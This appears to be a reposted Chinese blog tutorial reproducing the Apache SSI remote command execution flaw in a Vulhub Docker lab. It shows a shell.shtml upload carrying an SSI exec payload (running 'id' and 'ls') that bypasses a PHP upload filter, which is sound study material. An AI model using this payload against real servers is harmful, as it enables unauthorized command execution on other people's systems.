P3 利用Vulnhub复现漏洞 - Apache SSI 远程命令执行漏洞
作者:互联网
大家好!
我是小黄,很高兴又跟大家见面啦 !
拒绝水文,从我做起 !!!!
今天更新的是:
-
P3 利用Vulnhub复现漏洞 - Apache SSI 远程命令执行漏洞
-
往期检索:程序设计学习笔记——目录
创建时间:2021年3月19日
软件: MindMaster Pro 、Burp Suite Pro 、火狐浏览器
Apache SSI 远程命令执行漏洞
Vulnhub 官方复现
漏洞原理
- 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用
<!--#exec cmd="id" -->语法执行任意命令。 - 参考链接:
- Apache httpd教程:服务器端包含的简介
- SSI命令
环境准备
- 打开漏洞存放路径:
cd /home/vulhub/vulhub/httpd/ssi-rce
- 搭建及运行漏洞环境:
docker-compose up -d
这里如果安装失败的话重启虚拟机。
- 环境启动后,访问
http://your-ip:8080/upload.php,即可看到一个上传表单。
漏洞复现
- 正常上传PHP文件是不允许的,我们可以上传一个shell.shtml文件:
<!--#exec cmd="ls" -->
- Burp Suite Pro 检查一下抓到的数据包,检查一下情况
- 成功上传,然后访问shell.shtml
- 访问
shell浏览器输入:http://your-ip:8080/shell.shtml - 查看执行成功。
__
走过路过的朋友,如果觉得可以学到些什么的话,点个赞 再走吧,欢迎各位路过的大佬评论,指正错误,也欢迎有问题的小伙伴评论留言,私信。
每个小伙伴的关注都是本人更新博客的动力!!!
请微信搜索【 在下小黄 】文章更新将在第一时间阅读 !
把握现在 ,展望未来 ,加油 !
由于水平有限 ,写的难免会有些不足之处 ,恳请各位大佬不吝赐教 !
标签:P3,漏洞,SSI,复现,Apache,上传,Vulnhub 来源: https://blog.csdn.net/weixin_44519789/article/details/115013527